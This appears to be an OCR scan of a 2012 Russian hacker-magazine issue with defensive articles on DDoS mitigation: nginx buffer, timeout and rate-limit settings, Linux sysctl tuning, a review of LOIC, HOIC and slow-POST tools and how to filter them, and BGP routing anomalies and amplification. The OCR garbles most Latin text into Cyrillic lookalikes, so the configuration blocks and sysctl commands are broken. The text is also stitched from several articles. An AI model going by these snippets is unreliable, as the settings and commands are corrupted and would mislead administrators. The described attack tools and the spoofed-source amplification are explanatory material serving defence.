ведем речь о серьезных изменениях показателей. Когда это происхо- 
дит внезапно — пока вы пытаетесь решить проблему своими силами 
и если не видите ее сразу в логе, лучше быстро проверьте движок и 
параллельно обратитесь к специалистам. 

НЕ ЗАБЫВАЙТЕ ПРО ТСРОІЛЧР 

Многие забывают, что крбштр — это обалденное 
средство диагностики. Я приведу пару примеров. 

В декабре 2011-го был обнаружен баг в ядре Ыпііх, 
когда оно открывало ТСР-соединение при выстав- 
ленных флагах ТСР-сегмента 5ѴІ\І и Р5Т. Первым 
багрепорт отправил именно системный администратор из России, 
чей ресурс был атакован этим методом, — атакующие узнали об 
уязвимости раньше, чем весь мир. Ему, очевидно, такая диагно- 
стика помогла. Другой пример: у пдіпх есть одно не очень приятное 
свойство — он пишет в лог только после полной отработки запроса. 
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Отбить 00о5 



Бывают ситуации, когда сайт лежит, ничего не работает и в логах 
ничего нет. Все потому, что все запросы, которые в данный момент 
загружают сервер, еще не выполнились. Тсрбитр поможет и здесь. 

Он настолько хорош, что я советовал людям не использовать 
бинарные протоколы до того, как они убедятся, что все в поряд- 
ке, — ведь текстовые протоколы отлаживать Арбитром легко, а 
бинарные - нет. Однако сниффер хорош как средство диагности- 
ки — в качестве средства поддержания ргосіисііоп'а он страшен. 

Он легко может потерять сразу несколько пакетов и испортить вам 
историю пользователя. Смотреть его вывод удобно, и он пригодится 
для ручной диагностики и бана, но старайтесь ничего критичного на 
нем не основывать. Другое любимое многими средство «потрепать 
запросы» — пдгер — вообще по умолчанию пытается запросить в 
районе двух гигабайт несвопируемой памяти и только потом начина- 
етуменьшать свои требования. 




АТАКА ИЛИ НЕТ? 

Как отличить ББоБ-атаку, например, от эффекта 
рекламной кампании? Этот вопрос может показаться 
смешным, но эта тема не менее сложная. Бывают 
довольно курьезные случаи. У одних хороших ребят, 
когда они напряглись и основательно прикрутили 
кеширование, сайт слег на пару дней. Выяснилось, что в течение 
нескольких месяцев этот сайт незаметно датамайнили какие-то 
немцы и до оптимизации кеширования страницы сайта у этих 
немцев со всеми картинками грузились довольно долго. Когда 
страница начала выдаваться из кеша моментально, бот, у которого 
не было никаких тайм-аутов, тоже начал собирать их моментально. 
Тяжело пришлось. Случай особенно сложный по той причине, что 
если вы сами изменили настройку (включили кеширование) и сайт 
после этого перестал работать, то кто, по вашему и начальственному 
мнению, виноват? Вот-вот. Если вы наблюдаете резкий рост числа 
запросов, то посмотрите, например, в Соодіе Апаіуіісз, кто приходил 
на какие страницы. 



ТЮНИНГ ВЕБ-СЕРВЕРА 

Какие еще есть ключевые моменты? Конечно, вы можете поставить 
«умолчальный» пдіпх и надеяться, что у вас все будет хорошо. Однако 
хорошо всегда не бывает. Поэтому администратор любого сервера 
должен посвятить немало времени тонкой настройке и тюнингу пдіпх. 




ЛИМИТИРУЕМ РЕСУРСЫ 
(РАЗМЕРЫ БУФЕРОВ) В ЫСШХ 

Про что нужно помнить в первую очередь? Каждый 
ресурс имеет лимит. Прежде всего это касается опе- 
ративной памяти. Поэтому размеры заголовков и всех 
используемых буферов нужно ограничить адекватны- 
ми значениями на клиента и на сервер целиком. Их обязательно нужно 
прописать в конфиге пдіпх. 

• сІіепІ_ЬеасІег_ЬиНег_5І2е 

Задает размер буфера для чтения заголовка запроса клиента. 

Если строка запроса или поле заголовка запроса не помещаются 
полностью в этот буфер, то выделяются буферы большего размера, 
задаваемые директивой Іа где сІіепі ЬеасІег Ьи^егз. 

• Іагде_сІіепІ_ІіеасІег_ЬиНег5 

Задает максимальное число и размер буферов для чтения большого 
заголовка запроса клиента. 

• сІіепІ_ЬосІу_ЬиНег_5І2е 

Задает размер буфера для чтения тела запроса клиента. Если тело 
запроса больше заданного буфера, то все тело запроса или только 
его часть записывается во временный файл. 

• сІіепІ_тах_ЬосІу_5І2е 

Задает максимально допустимый размер тела запроса клиента, ука- 
зываемый в поле «СопІепЫ_епдіЬ» заголовка запроса. Если размер 
больше заданного, то клиенту возвращается ошибка 413 (Рециезі 
ЕпШу Тоо І_агде). 



НАСТРАИВАЕМ ТАЙМ-АУТЫ В МШХ 

Ресурсом является и время. Поэтому следующим 
важным шагом должна стать установка всех тайм- 
аутов, которые опять же очень важно аккуратно 
прописать в настройках пдіпх. 

• ге5ѲІ_ІітесІоиІ_соппесІіопоп; 

Помогает бороться с сокетами, зависшими 
в фазе РІ N -ѴѴАІТ. 

• сІіепІ_ЬеасІег_ІітеоиІ 

Задаеттайм-аутпри чтении заголовка запроса клиента. 

• сІіепІ_ЬосІу_ІітеоиІ 

Задаеттайм-аутпри чтении тела запроса клиента. 

• кеераІіѵе_ІітеоиІ 

За дает тайм-аут, в течение которого кеер-а I іѵе соединение с 
клиентом не будет за крыто со стороны сервера. Многие боятся 
задавать здесь крупные значения, но мы неуверены, что этот страх 
оправдан. Опционально можно выставить значение тайм -аута в 
НТТР-заголовке Кеер-АІіѵе, но Іпіегпеі Ехріогегзнамениттем, что 
игнорирует это значение 

• зепсМітеоиІ 

Задает тайм-аут при передаче ответа клиенту. Если по истечении 
этого времени клиент ничего не примет, соединение будет за крыто. 

Сразу вопрос: какие параметры буферов и тайм-аутов правиль- 
ные? Универсального рецепта тут нет, в каждой ситуации они свои. 
Но есть проверенный подход. Нужно выставить минимальные 
значения, при которых сайт остается в работоспособном состоянии 
(в мирное время), то есть страницы отдаются и запросы обрабаты- 
ваются. Это определяется только тестированием — как с десктопов, 
так и с мобильных устройств. Алгоритм поиска значений каждого 
параметра (размера буфера или тайм-аута): 

1. Выставляем математически минимальное значение параметра. 

2. Запускаем прогонтестовсайта. 

3. Если весь функционал сайта работает без проблем — параметр 
определен. Если нет — увеличиваем значение параметра и пере- 
ходим кп. 2. 

4. Если значение параметра превысило даже значение по умолча- 
нию — это повод для обсуждения в команде разработчиков. 

В ряде случаев ревизия данных параметров должна приводить 
к рефакторингу/редизайну сайта. Например, если сайт не работает 
без трехминутных АЭАХ Іопд роіііпд запросов, то нужно не тайм- 
аут повышать, а Іопд роіііпд заменять на что-то другое — ботнет в 
20 тысяч машин, висящий на запросах по три минуты, легко убьет 
среднестатистический дешевый сервер. 
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ЛИМИТИРУЕМ СОЕДИНИЛ В Ы6ШХ 

(иміт_соммииміт_КЕО) 

В пдіпх также есть возможность лимитировать со- 
единения, запросы и так далее. Если вы не уверены 
в том, как поведет себя определенная часть вашего 
сайта, то в идеале вам нужно протестировать ее, 
понять, сколько запросов она выдержит, и прописать это в конфи- 
гурации пдіпх. Одно дело, когда сайт лежит ивы способны прийти и 
поднять его. И совсем другое дело — когда он лег до такой степени, 
что сервер ушел в зѵѵар. В этом случае зачастую проще перезагру- 
зиться, чем дождаться его триумфального возвращения. 

Предположим, что на сайте есть разделы с говорящими названи- 
ями /сіоѵѵпіоасі и /зеагсЬ. При этом мы: 

• не хотим, чтобы боты (или люди с чересчур ретивыми рекурсивны- 
ми сіоѵѵпіоасі- менеджера ми) забили нам табл и цуТСР-соеди нений 
своимизакачками; 

• нехотим, чтобы боты (илизалетные краулеры поисковыхсистем) 
исчерпали вычислительные ресурсы СУБД множеством поисковых 
запросов. 



Для этих целей сгодится конфигурация следующего вида: 
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С0ѴЕР5Т0КѴ 



ьш { 



Іішііі сопп гопе $Ьіпагу_гето1:е_асІсІг 2опе=сІоып1оасІ_с : 10т; 
Іі тііігедгоп е $Ьіп агу_гет о1 :е _ асІсІг го пе=5еа гсІі _г : 10 т \ 
па1:е=1г/5 ; 



зегѵег { 

Іосаііоп /сіоыпіоасі/ { 

Ііт ііі сопп сІоып1оасІ_с 1; 

# Прочая конфигурация Іосаіііоп 

} 



1оса1:іоп /зеагс М/ { 

1±т±1= гед іопе=5еагсІі г Ьигз1:=5; 
# Прочая конфигурация Іосаіііоп 

} 



не только ІР, но и любая другая переменная пдіпх, доступная в 
данном контексте, — например, в случае, когда вы не хотите 
обеспечить более щадящий режим для прокси, можно использо- 
вать $Ьіпагу_гетоІе_асІсІг$Шр_и5ег_адепІ или $Ьіпагу_гетоІе_ 
асИг$Шр_соокіе_тус 00 кіе 2 — но использовать такие конструк- 
ции нужно с осторожностью, поскольку, в отличие от 32-битного 
$Ыпагу_гетоІе_асІсІг, эти переменные могут быть существенно 
большей длины и декларированные вами «Ют» могут скоропо- 
стижно закончиться. 

ГОТОВИМ ос 

Помимо тонкой настройки пдіпх, нужно позаботиться о настрой- 
ках сетевого стека системы. По меньшей мере — сразу включить 
пеЮрѵ4іср_5упсоокіез в зузсіі, чтобы разом защитить себя от 
атаки 5У N -Л оосі небольшого размера. 



} 

Ь_ 

Обычно имеет прямой смысл установить ограничения ІітіІ_ 
сопп и ІітіІ_гед для Іосаііопз, в которых находятся дорогостоящие 
к выполнению скрипты (в примере указан поиск, и это неспроста). 
Ограничения необходимо выбирать, руководствуясь результатами 
нагрузочного и регрессионного тестирования, а также здравым 
смыслом. 

Обратите внимание на параметр Ют в примере. Он означает, 
что на расчет данного лимита будет выделен словарь с буфером 
в 10 мегабайт и ни мегабайтом более. В данной конфигурации 
это позволит отслеживать 320 000 ТСР-сессий. Для оптимизации 
занимаемой памяти в качестве ключа в словаре используется 
переменная $Ыпагу_гето1е_асИг, которая содержит ІР-адрес 
пользователя в бинарном виде и занимает меньше памяти, чем 
обычная строковая переменная $гетоІе_асІсІг. Нужно заметить, 
что вторым параметром к директиве ІітіІ_гед_ 20 пе может быть 



ТРЕНДЫ В 0005 




ТЮНИМЯДРО 

Обратите внимание на более продвинутые на- 
стройки сетевой части (ядра) опять же по тайм- 
аутам и памяти. Есть более важные и менее важ- 
ные. В первую очередь надо обратить внимание на: 

• пе1.ірѵ4.1ср_7іп_ІітеоиІ 

Время, котороесокетпроведетвТСР-фазе РІ N -ѴѴАІТ-2 (ожидание 
РІЫ/АСК-сегмента). 

• пе1.ірѵ4.1ср_{,г,ѵѵ}тет 

Размер приемного буфера сокетов ТСР. Три значения: минимум, 
значение по умолчанию и максимум. 

• пе1.соге.{г,ѵѵ}тет_тах 

То же самое для не ТСР буферов. 



При канале в 100 Мбит/с значения по умолчанию еще как-то 
годятся; но если у вас в наличии хотя бы гигабит в секунду, то 
лучше использовать что-то вроде: 



5Ѵ5СІІІ -ѵі пеіі.сопе. птет тах=8388608 

5у5сТ1 -м пеТ.соге.мтет_тах=8388608 

5у5СІ:1 -ѵі пе1:.ірѵ4.1:ср_гтет= '4096 87380 8388608' 

ву5СІ:1 -ѵі пе1:.ірѵ4.1:ср_ытет= '4096 65536 8388608' 

5у5с1:1 -ѵі пе1:.ірѵ4.1:ср_6п_1:ітеои1:=10 



1. Непрерывно растет мощность атак сетевого и транспортного 
уровня. Потенциал среднестатистической атаки типа 5ѴІМ- 
флуд достиг уже 10 миллионов пакетов в секунду. 

2. Особым спросом в последнее время пользуются атаки на 
РМ5. II РР-флуд валидными 0М5-зап росами созрооГленными 
ІР-адресами источника — это одна из наиболее простых в 
реализации и сложных в плане противодействия атак. Многие 
крупные российские компании (в том числе хости нги) испы- 
тывали в последнее время проблемы в результате атак на их 

Р N5- серверы. Чем дальше, тем таких атак будет больше, а их 
мощность будет расти. 

3. Судя по внешним признакам, большинство ботнетов управ- 
ляется не централизованно, а посредством пиринговой сети. 
Это дает злоумышлен никам возможность синхронизировать 
действия ботнета во времени — если раньше управляющие 
команды распространялись по ботнету в 5 тысяч машин за 
десятки минут, то теперь счет идет на секунды, а ваш сайт 
может неожиданно испытать мгновенный стократный рост 
числа запросов. 

4. Доля ботов, оснащенных полноценным браузерным движком 
с ЭаѵаЗсгірІ, все еще невелика, но непрерывно растет. Такую 
атаку сложнее отбить встроенными подручными средствами, 
поэтому Самодел кины должны с опасением следить за этим 
трендом. 



Подробнее об установке параметров сетевого стека при нали- 
чии широкого канала можно прочитать здесь: Шр://Ы1.1у/8Ц05Рд . 

РЕВИЗИЯ /РК0С/5Ѵ5/МЕТ/** 

Идеально изучить все параметры /ргос/зуз/ 
пеі/**. Надо посмотреть, насколько они отли- 
чаются от дефолтных, и понять, насколько они 
адекватно выставлены. Ыпих-разработчик (или 
системный администратор), разбирающийся в 
работе подвластного ему интернет-сервиса и желающий его 
оптимизировать, должен с интересом прочитать документацию 
всех параметров сетевого стека ядра. Возможно, он найдеттам 
специфические для своего сайта переменные, которые помогут 
не только защитить сайт от злоумышленников, но и ускорить его 
работу. 



НЕ БОЯТЬСЯ! 



Успешные РРоВ-атаки изо дня в день гасят е-соттегсе, со- 
трясают СМИ, с одного удара отправляют в нокаут крупнейшие 
платежные системы. Миллионы интернет-пользователей теряют 
доступ к критичной информации. Угроза насущна, поэтому нужно 
встречать ее во всеоружии. Выполните домашнюю работу, не 
бойтесь и держите голову холодной. Вы не первый и не послед- 
ний, кто столкнется с РРоВ-атакой на свой сайт, и в ваших силах, 
руководствуясь своими знаниями и здравым смыслом, свести 
последствия атаки к минимуму. □С 
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НАЖМИ НА КНОПКУ — I 
ПОЛУЧИШЬ РЕЗУЛЬТАТ 



В центре нашего внимания оказался инстру- 
мент с замечательным названием І_оѵѵ ОгЬіІаІ 
Іоп Саппоп (ЮІС) и различные его произво- 
дные. Простая как две копейки утилита, до- 
ступная массам и способная генерить трафик 
и нагрузку на заданный сайт. Но главное, что 
появилось у атакующих, — возможность рас- 
пространять готовое к употреблению средство 
для участия в атаке, ссылку на которое можно 
предложить всем сочувствующим перед нача- 
лом 00о5 в социальных сетях, чатах, имид- 
жбордах и других каналах связи. Соучастни- 
ков потребуется минимальная настройка под 
себя — и можно объявлять начало. 



ЧТО ЖЕ ПРОИСХОДИТ ВНУТРИ? 



Стоит отметить, что ЮІС — не единственный 
инструмент«бунтарей без причины» и исполь- 
зуется не одна его вариация. Кратко рассмо- 
трим весь арсенал. 

35 ЮІС 

^ ЮІС атакует случайными НТТР-запросами. 
Тут есть сигнатура: стоит неверный геіюгегтого 
сайта, откуда программа запускалась, и ІІРІ, 
сформированный совершенно неестественным 
для любого веб-ресурса образом. Мы видим 
внутренний ЮІС'овский номер запроса и от- 
правленное протестующим сообщение. Чего 
стоит это отфильтровать? Да ничего. Тут даже 
поведенческий анализ не нужен. 



ЮІСУйР 

Поговорим про стандартный ЮІС ІЮР. Ничего 
особенного. Утилита шлет ІЮР-пакеты длиной 
48 байт на НТТР-порт. Какие проблемы за- 
щититься от этого? Что вообще должен делать 
ІЮР-пакет на вашем ѵѵѵѵѵѵ-сервере? Стройте 
ассезз-листы. Другая вариация: ЮІС ТСР от- 
крывает честное ТСР-соединение и засыпает 
его нерелевантным мусором. Какие проблемы 
с этим могут быть? Опять же никаких: бюд- 
жетируйте ресурсы, ограничивайте размеры 
данных и буферов. Веб-серверы пдіпх, ѴагпізЬ 
все это умеют. 

ЮІСНТТР 

Следующий вариант, самый классический, — 
ЮІС НТТР. Атут вообще нечего ловить. 
Принцип у него простой: ОЕТ Т так быстро, 
как мы только сможем, да еще и заголовки 
невалидные. С точки зрения защиты, такие за- 
просы до вашего бэкенда доходить в принципе 
не должны, если ваше приложение правильно 
построено. 

5ЮѴѴР05Т 

Вот еще такой интересный инструментарий 
Апопутоиз — 0ѴѴА5Р/5ЮѴѴР05Т. Открываем 
соединение и шлем данные с задержкой так 
долго, как только можно, чтобы занять ресурсы 
воркера на стороне сервера. Атака старая — 
ничего нового здесь нет. Почитайте, как нужно 
писать ТСР-приложения, например здесь: 
ЬіІ.ІѵЛсртапиаІ . 



НОІС 

Есть еще относительно новый инструмента- 
рий НОІС (НідЬ ОгЬМ; Іоп Саппоп] сзабавными 
апгрейдами. Атаки в этом инструменте можно 
скриптовать, можно добавлять список юзер- 
агентов и рефереров, которые будет простав- 
лять пушка, чтобы сбить защищающую сторону 
с толку и не дать построить стратегию по 
паттернам. Пользователю даже предлагается 
сделать список ІІРЕ, которые затем пушка вы- 
берет случайным образом. Впрочем, отбиться 
все равно не так сложно. 



ПОЧЕМУ ЗЛОБОДНЕВНО? 



Итак, что стоит за так называемым соци- 
альным ОйоЗ? ЮІС/Н0ІШ5ЮІС/0ѴѴА/ 
5ЮѴѴР05Т — технически нового тут ничего 
нет. Обычный коммерческий 0йо5, на самом 
деле, гораздо лучше скоординирован, тех- 
нически более совершенен. Имеем четкий 
и уверенный тренд к движению в сторону 
іи\\ Ьгоѵѵзег зіаск: наличие РІазЬ'а, умения 
понимать соокіе, редиректы, ЗаѵаЗсгірС На за- 
раженной машине запускается реальный брау- 
зер, который начинает делать реальные запро- 
сы! Но при этом про них почему-то молчат. Все 
говорят про ЮІС. А все потому, что появился 
самый важный фактор — социальность. 

Почему же это работает на техническом 
уровне? А все потому, что имеем ужасающий 
дизайн веб-приложений, в том числе правитель- 
ственных структур, плюс плохой дизайн инфра- 
структуры. Заметьте, Апопутоиз не атаковали 



030 



ХАКЕР 11 /166/2012 








Александр Лямин, генеральный директор компании НИ 



Социальный ООоЗ 



Лі 



ПОЧЕМУ ВСЕ 
ГОВОРЯТ ПРО ЮІС? 

В какой-то момент неожиданно о ООоЗ стали говорить 
все. Перегрузка чужих серверов перестала быть чисто 
технической темой и стала восприниматься как полити- 
ческий инструмент, форма протеста, орудие возмездия 
сетевых маргиналов. Однако, как выясняется, львиная 
доля ддосеров, оказавшихся в заголовках крупных СМИ 
и на устах «гражданских», берут совсем не умением, а 
числом и примитивными, недейственными инструмен- 
тами. Все это не только работает, но и обнажает разно- 
образные глупости в защите и архитектуре даже самых 
популярных ресурсов — и это весомый повод, чтобы 
все-таки поговорить об этой теме и на страницах ][. 



РасеЬоок. Потому что без шансов (по крайней 
мере в плане ООоЗ). Хорошо построились ребята, 
молодцы. Соодіе тоже атаковать бессмысленно, 
правильно выстроились, Яндекс, наверное, мож- 
но, но придется приложитьтитанические усилия. 

Появилось еще такое свойство, как 
массовость. Вот представьте, вышли на про- 
тесты сто тысяч человек, а некоторым было 
лень, а другие были в регионах. А сколько 
миллионов может откликнуться на призыв 
Апопутоиз? А теперь умножьте эти миллионы 
на скорость аплинка 05І_-модема. Круглые 
цифры получаются. Все-таки может быть 
опасно. Есть еще фактор X. Он состоит в том, 
что Апопутоиз — это неоднородная структура 
с четким разделением: люди-профессионалы 
(те самые, которые сломали инфраструктуру 
Зопу и увели у них персональные данные) и 



соучастники, которые ответили на этот призыв 
и вышли заявить свои протест. Профессиона- 
лы организуют, вооружают и наносят основной 
урон, соучастники создают фоновую нагрузку и 
численную безопасность. 



ВРЕДНЫЕ СОВЕТЫ 



В Сети можно найти немало советов, кактакую 
атаку погасить. Одна проблема — советы, как 
правило, вредные. 

• ВРЕДНЫЙ С0ВЕТ№ 1:Фильтроватьзапросы 
по паттерну«НТТР/1.0 + заголовокНозІ». 
Если они совпадают, с клиентом что-то не 
так, поскольку в НТТР/1. 0 не было имплемен- 
тированозаголовка НозЕ 
Правда: На самом деле — везде и рядом мы 
это наблюдаем. Прокси такие вещи умеют 
и любят делать. Поставите это правило и 



получите кучуложныхерабатываний (так 
называемых Раізе РозШѵез). Атака отчасти 
достигнет своей цели, заблокировав суще- 
ственную долю л егитимных пользователей. 

• ВРЕДНЫЙ СОВЕТ № 2: Клевое решение — 
если пушка выставляетпорядокзаголовков, 
нехарактерный для браузеров, давайте 
делать Ппдегргіпііпд. 

Правда: Тоже, в общем-то, абсолютно бес- 
полезная штука. Орега Міпі ставит за головки 
совершенно сумасшедшим образом. Полу- 
чите кучу Раізе РозШѵез. 

• ВРЕДНЫЙ С0ВЕТ№3: Пушка ставитнехарак- 
терные двойные пробелы перед за головка- 
ми — давайте фильтровать по этому признаку. 
Правда: При помощи скриптовэтотпаттерн 
атакующие могут легко и просто обойти. Это 
не должно вызвать никаких проблем. 

• ВРЕДНЫЙ СОВЕТ № 4: ПоставитытюсІ_ 
зесигііудля АрасЬе — что ж, удобно, судя по 
названию — безопасность гарантирована. 
Правда: Если вы пользуетесь АрасЬе, пере- 
станьте это делать, в 20 1 2 годуу васнетна 
это ни од ной причины. Эта штука сломана на 
архитектурномуровне, полностью починить 
ее невозможно. 

• ВРЕДНЫЙ СОВЕТ №5: А да вайте напишем 
скрипты для ЗпогЕа и будем ездить гедехр'ом 
потелу пакета? 

Правда:Авы посчитайте: восколько вам 
обойдется скопироватьданные пакета в 
изегіапсі и пропуститьчерез гедехр?3адача, 
конечно, достойная для суперкомпьютеров 
класса «Ломоносов», но на вашем фронтенде 
делатьэтого не рекомендую категорически. 



ПОЛЕЗНЫЙ СОВЕТ 



Необходимо и достаточно устроить серию те- 
стов на соответствие возможностей клиента с 
возможностями браузера: редиректы, печень- 
ки, ява-скрипт, плагины. Эльдар Заитов (ЕІсІаг 
2аіІоѵ) написал соответствующий модуль для 
пдіпх. Как это использовать и еще 15 полезных 
рецептов ты можешь прочитать в соокЬоок'е на 
страницах рядом. 



ПОДВЕДЕМ ИТОГИ 



Социальный протест де-факто обрел новую 
форму — электронную. Тренд на повышение 
четко виден. Скорость распространения или 
нераспространения информации определяет 
то, как мы живем. А ОйоЗ является действен- 
ным способом ее блокировки. Еще один важ- 
ный вывод. Любая ООоЗ-атака имеет радиус 
«осколочного поражения» и может оказывать 
негативное воздействие на целые сегменты 
Сети. Апопутоиз, глупо рубить сук, на котором 
сидишь! Интернет вас вырастил — и вы же 
его и укапываете. Мне непонятно, почему они 
протестуют, а у меня торренты и «ВКонтак- 
те» плохо открываются :). Нехорошо. Право 
протеста — это замечательно, главное, чтобы 
мирных граждан не трогали. НС 



ВОПРОС ИЗ ЗАЛА: АІМ0МѴМ01І5 Ѵ5. КОРНЕВЫЕ 0145? 



В марте группа Апопутоиз собиралась обрушить все корневые 0145-серверы. Реально ли это сделать? 
Конечно же, нет! Корневые 0143-серверы живут в режиме ВбР-апусазЕ точно также, как и наша система 
фильтрации ОгаЩг. По сути, это несколько не связанных между собой серверов, анонсирующих вовне 
один и тотже префикс. Даже если удастся забить один из каналов одного из серверов, трафик за счет 
В6Р сразу же перераспределится на оставшиеся. Даже если бы Апопутоиз смогли атаковать ну один- 
два из этих серверов, остальные бы этого не заметили благодаря тому, что весьтрафик от автономной 
системы-источника, с которой велась бы атака, приходил бы всегда на один и тотже сервер. 
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Александр Азимов, ведущий инженер по эксплуатации сети фильтрации трафика Огаіог 
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ВЛИЯНИЕ СЕТЕВЫХ 
АНОМАЛИЙ 
НА ДОСТУПНОСТЬ 
СЕТЕВЫХ РЕСУРСОВ 




Для деприоритизации маршрута на^еждоменном сетевом уровне 
используется ргерепсі роіісу, основанная на вставке нескольких 
номеров АС подряд: 



А5 РАТН 



Начальное значение 

После деприоритизации 
маршрута 



222 333 444 
222 333 333 333 444 



ВВЕДЕНИЕ 



00о5-атака в 40 Гбит/с? Редкий ботнет способен сгенерировать та- 
кой объем трафика. Однако мощность атаки может быть увеличена 
в десятки раз за счет сетевых аномалий. И при таком раскладе по- 
добные цифры уже не кажутся фантастикой. Сегодня мы попробуем 
разобрать несколько примеров сетевых аномалий и рассмотрим их 
влияние на доступность конечных ресурсов. 



АЗЫ 



Начнем с вводной для тех, кто незнаком с проблемами сетевых 
аномалий и вопросами междоменной маршрутизации. Главными 
действующими лицами на междоменном сетевом уровне являются 
автономные системы (АС) — системы ІР-сетей и маршрутизаторов, 
управляемых одним или несколькими операторами, имеющими 
единую политику маршрутизации с интернетом. АС — это прежде 
всего административная единица. Она должна быть зарегистри- 
рована в одном из региональных интернет-регистраторов, и ей 
должен быть присвоен номер АС (в Европе интернет-регистратор — 
РІРЕ). Существуеттри основныхтипа АС: 

• многоинтерфейсная (имеет два или более поставщика услуг, 
которые к ней подключены); 

• транзитная (тоже самое, но также пропускает через себя чужой 
трафик); 

• ограниченная (имеет всего один контакте внешним миром, на 
самом деле таких АС быть не должно, но они есть). 

Между АС действует де-факто стандартный протокол внешней 
маршрутизации ВОР. Это дистанционно-векторный протокол, 
то есть выбор маршрута определяется метрикой пути (в данном 
случае это количество АС, через которые должен пройти пакет). 
Последовательность номеров АС хранится в атрибуте А5_РАТН. 



В этом примере АСЗЗЗ деприоритизирует маршрут, отсылаемый 
АС222. С использованием атрибута А5_РАТН в ВОР реализова- 
на защита от циклов маршрутизации: если АС получает анонс, 
в А5_РАТН которого входит номер данной АС, то этот анонс сбра- 
сывается. Это позволяет исключить теоретическую возможность 
возникновения статических циклов маршрутизации на уровне АС. 

В протоколе ВОР была также заложена возможность отражения 
экономических отношений между АС. Данная функциональность 
реализуется с использованием атрибута ЕОСАЕ_РРЕР, который 
позволяет явно указывать приоритетный канал, вне зависимости 
от значений атрибута А5_АРАТН. Процесс маршрутизации ВОР 
в чем-то похож на размахивание флагом: АС сообщает, что имеет 
маршрут к заданной сети, то есть она анонсирует эту сеть во внеш- 
ний мир. Рис. 1 описывает пример того, как это происходит. 

Здесь многоинтерфейсная АС222 имеет префикс, который она 
анонсирует своим поставщикам услуг (которые тоже являются АС). 
Далее уже поставщики услуг АС222 будут анонсировать заданную 
сеть своим соседям и так далее. Информацию о маршрутах к внеш- 
ним сетям АС222 получает от своих соседей. Однако зачастую АС 
столько информации не нужно, и тогда она может использовать 
сіе^аиіі гоиіе, то есть при отсутствии маршрута в таблице маршру- 
тизации пакет отправлять в заданную соседнюю АС. 



БЛИЖЕ К ДЕЛУ: ОШИБКИ 
В НАСТРОЙКЕ МАРШРУТИЗАТОРОВ 



Мы выделили три основных класса сетевых аномалий: 

1) ошибки в настройке маршрутизаторов; 

2) циклы маршрутизации ВОР; 

3) проблемы науровнесреды передачи данных (СПД). 

Далее будут рассмотрены первые два класса. Начнем с наи- 
более частой сетевой ошибки, возникающей при настройке 
сМаиИ гоиіе. Ошибка возникает в случае, если, с одной стороны, 
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Сетевые аномалии: ближе, чем кажется 



анонсируется префикс без его установки на ІоорЬаск-интерфейсе 
и одновременно с этим на том же канале настроен сіе^аиіі гоиіе. 
Что получается в результате? Если мы отправим пакет на любой 
неиспользуемый ІР-адрес из этого префикса, то он попадет в 
цикл на стыке АС и АС-поставщика. Пакет будет оставаться в 
этом цикле, пока не истечет значение ТТІ_. Чем это плохо? Такая 
настройка делает сеть уязвимой к атаке на исчерпание канала. 

И даже если канал не будет исчерпан, АС все равно придет- 
ся отдуваться за увеличенный объем трафика. Наша система 
мониторинга обнаружила более 14 тысяч уязвимых префиксов. 
Второй ошибкой в настройке маршрутизаторов являются непо- 
средственно усилители ОйоЗ-атак. Один из вариантов усили- 
теля выглядит следующим образом: вы отправляете один есЬо 
гециезС в народе известный по утилите ріпд, и получаете на него 
десяток есЬо геріу. Атакующему достаточно проставить в зоигсе 
ІР-адреса атакуемой сети для получения усиления 00о5-атаки в 
десять раз. Более того, в результате атакованными оказываются 
несколько АС: 

1) АС, в которой находится уязвимость; 

2) АС, чье адресное пространство используется для атаки; 

3) транзитныеАС, которыечерез себя весьэтотмусор и пропускают. 

Здесь нужно сделать два замечания. Во-первых, это не теория, 
такой вид атаки был уже несколько раз детектирован сетью 
фильтрации трафика (Згаіог. Во-вторых, в случае защиты от 00о5- 
атак на операторском уровне данный вид уязвимости позволяет 
проводить атаки в обход защищаемого периметра. Это связано с 
тем, что фильтрующее оборудование обычно стоит на стыках с АС- 
поставщиками, а данная сетевая уязвимость позволяет добиться 
эффекта, когда клиентские сети атакуют друг друга. Мы обнаружи- 
ли более 700 префиксов с этой уязвимостью. 



ВТОРОЙ ПУНКТ ПРОГРАММЫ: ЦИКЛЫ 
МАРШРУТИЗАЦИИ ВОРД- ; - Ч 



Случалось, клиенты жаловались, что ресурсы сети частично недо- 
ступны, трафик между площадками странно мигает при полностью 
«холодном» оборудовании, а у наших сервис-провайдеров проблем 
при этом не было. Так мы узнали, что динамические циклы марш- 
рутизации ВСР существуют не только в теории. 

За последние полтора месяца нашей системой мониторинга 
было обнаружено более 2 тысяч циклов маршрутизации. Причина 
циклов маршрутизации ВСР может варьироваться, но их резуль- 
тат аналогичен йоЗ-атаке: целевая сеть становится частично или 
полностью недоступна для части интернета. Дополнительно циклы 
создают ощутимый шум ВСР-сообщений, что осложняет работу всей 
сети ВСР-маршрутизации. И главное: данную сетевую нестабиль- 
ность невозможно обнаружить со стороны АС-источника маршрута. 

Как возникают динамические циклы ВСР? По сути, они воз- 
никают в трех случаях. 



АБІ74 


А53356 


А570ІЗ 


А56939 


«701 


«354$ 


АЗИИ 
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Рис. 2 




1. Вне зависимости от АС-источника, транзитные АС могут об- 
разовать цикл приоритетов по атрибуту І_ОСАІ__РРЕР. То есть 
каждая из этих сетей указывает на соседнюю АС, что там трафик 
выгоднее. В итоге если анонс попадет в это кольцо, то процесс 
распространения маршрута ВСР никогда не закончится. Нач- 
нется гонка ВСР-сообщений, при которой конкурирующие анон- 
сы не смогут догнать один другого, периодически выстраиваясь 
в полностью построенный цикл, откуда пакеты уже не могут 
выйти. Время жизни этого цикла обычно кратно 30 секундам. 

Но главная проблема в том, что этот цикл воссоздается — после 
разрушения цикла снова повторяется гонка анонсов, которая 
заканчивается возникновением нового цикла. И так по кругу. 

2. Удаление анонса префикса у одного из АС-поставщи ков тоже 
может привести к возникновению циклов на стыках АС, опять 
же из-за сіе^аиіі гоиіе. Время жизни данной сетевой аномалии 
будет прямо пропорционально длине последовательности АС 
с отношениями «поставщик — покупатель» (обычно именно 

в таких случаях уста на вливается сЫаиІІ гоиіе). 

3. Рассмотренный механизмуправления ВСР-анонсами ргерепб 
роіісу также может стать причиной возникновения цикла. Данный 
эффектвозникаетиз-затого, что маршрутная информация рас- 
пространяется не сразу и необязательно по оптимальным путям, 
а согласно политике маршрутизации, отчего опятьже возможно 
появление относительно стабильного кольца маршрутизации. 



СТАТИСТИКА: ПРАВ ЛИ КАЛЕНДАРЬ МАЙЯ? 



Поговорим немного о статистике. В таблице на рис. 2 перечис- 
лены крупнейшие АС, в которых были обнаружены проблемы. 

В этот список попали несколько Тіег-1 АС, которые являются, 
по сути, «сердцем» интернета. Существует более четырех тысяч 
